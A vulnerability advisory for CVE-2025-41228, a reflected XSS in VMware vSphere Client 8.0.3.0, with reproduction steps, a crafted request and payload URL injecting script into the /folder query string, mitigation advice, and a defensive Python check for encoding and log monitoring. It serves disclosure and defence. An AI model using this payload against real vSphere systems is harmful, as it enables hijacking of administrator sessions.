VULNERABILITY DATABASE●AUGUST 11, 2025

CVE-2025-41228 - VMware vSphere Client 8.0.3.0 XSS


VULNERABILITY INFO

Category: Vulnerabilities
Published: August 11, 2025
Author: Imraan Khan (Lich-Sec)
Read time: 2 min

Tags: #CVE-2025-41228 #VMWARE #XSS


Reflected XSS in VMware vSphere Client 8.0.3.0 via unsanitized query string on /folder endpoint.

Vulnerability Overview

A reflected Cross-Site Scripting (XSS) vulnerability exists in VMware vSphere Client version 8.0.3.0. The application fails to sanitize input passed via a query string to the /folder endpoint, resulting in arbitrary JavaScript execution when the reflected value is rendered into an HTML form’s action attribute.

Attack Vector: Network (web interface)
Attack Complexity: Low
Privileges Required: Valid authenticated session required to trigger in-browser execution
User Interaction: None (when attacker can induce a victim to visit the crafted URL)
CVE: CVE-2025-41228

Description

The vulnerable endpoint reflects query string input directly into a form action attribute without proper encoding. An attacker who can induce an authenticated administrator to open a crafted URL can achieve arbitrary script execution in the administrator's browser context.

Steps to Reproduce

  1. Initiate a benign request:

https://host/folder?ht7j4

  2. Intercept and modify the request using a proxy (e.g., Burp Suite). Inject payload into the query string:

GET /folder?ht7j4"><script>alert('ThisIsAnXSSBug')</script>tnkav=1 HTTP/2
Host: 192.168.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Referer: https://192.168.x.x/
Accept: text/html,application/xhtml+xml

  3. Forward the request. Inspect the HTTP response. The payload appears unencoded inside an HTML form:

<form action="/folder?ht7j4"><script>alert('ThisIsAnXSSBug')</script>tnkav=1" method="POST">
  <input name="VMware-CSRF-Token" type="hidden" value="..." />

  4. To observe execution, replay the exact malicious request in a browser with an active authenticated session (cookies present) or use Burp's "Open in Browser" with session cookies.

Example payload URL:

https://192.168.x.x/folder?ht7j4"><script>alert(1)</script>tnkav=1

Impact

Arbitrary JavaScript execution within the vSphere Client web interface. Possible consequences:

  • Session hijacking
  • Administrative actions via CSRF
  • Credential theft or phishing within the admin context
  • Further pivoting inside management workflows

Recommendation

Upgrade to VMware vCenter Server 8.0 U3e or later, which addresses CVE-2025-41228. If immediate upgrade is not possible:

  • Restrict access to management interfaces to trusted networks and IP ranges.
  • Require VPN or jump-host access for administrative consoles.
  • Apply Content Security Policy (CSP) and additional web-layer controls where feasible.
  • Monitor administrative sessions and anomalous requests to /folder.
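As an added example (not part of the original advisory or VMware's code), the Python below contrasts the unencoded reflection into the form action attribute described in this advisory with an attribute-encoded rendering, and applies a simple check over constructed access-log lines to surface requests to /folder that carry attribute-breaking characters, in line with the monitoring recommendation above. The rendering functions, the log format and the log entries are assumptions made for illustration.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# The reflected value from the PoC request in this advisory.
RAW_QUERY = "ht7j4\"><script>alert('ThisIsAnXSSBug')</script>tnkav=1"

# Constructed access-log lines (combined format); not real vCenter logs.
SAMPLE_LOG = [
    '10.0.0.5 - admin [11/Aug/2025:10:00:01 +0000] "GET /folder?dcPath=ha-datacenter HTTP/2" 200 1024',
    '10.0.0.5 - admin [11/Aug/2025:10:00:02 +0000] "GET /folder?ht7j4 HTTP/2" 200 512',
    '10.0.0.9 - admin [11/Aug/2025:10:00:03 +0000] "GET /folder?ht7j4%22%3E%3Cscript%3Ealert(1)%3C/script%3Etnkav=1 HTTP/2" 200 640',
    '10.0.0.9 - - [11/Aug/2025:10:00:04 +0000] "GET /ui/ HTTP/2" 302 0',
]

def render_form_vulnerable(query: str) -> str:
    """Models the bug: the query string lands in the attribute verbatim."""
    return f'<form action="/folder?{query}" method="POST">'

def render_form_fixed(query: str) -> str:
    """Hardened rendering: HTML-attribute-encode the reflected value so a
    double quote in the input can no longer close the action attribute."""
    return f'<form action="/folder?{html.escape(query, quote=True)}" method="POST">'

ACTION_RE = re.compile(r'action="([^"]*)"')

def script_outside_attribute(markup: str) -> bool:
    """True when a <script> tag appears after the action attribute closes,
    i.e. the reflected value broke out of the quoted attribute."""
    m = ACTION_RE.search(markup)
    return m is not None and "<script" in markup[m.end():].lower()

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Characters that can terminate an attribute value or open a tag.
BREAKOUT_RE = re.compile(r'["\'<>]')

def flag_folder_requests(log_lines) -> list:
    """Return request targets for /folder whose (URL-decoded) query string
    contains attribute-breaking characters; benign /folder traffic is kept out."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        if parts.path == "/folder" and BREAKOUT_RE.search(unquote(parts.query)):
            hits.append(m.group(1))
    return hits
```

The check decodes percent-encoding once before inspecting the query, so an encoded payload such as the one in the sample log is caught while ordinary datastore-browser requests are not flagged.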

References

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-41228
  • VMware Security Advisories: https://www.vmware.com/security/advisories

Credits

Discovered / PoC Author: Imraan Khan (Lich-Sec)
EDB ID: 52406
CVE: CVE-2025-41228


⚠️ DISCLAIMER: This document reproduces public exploit disclosure material for defensive and research use. Test only on systems you own or are authorized to test. Unauthorized exploitation is illegal.
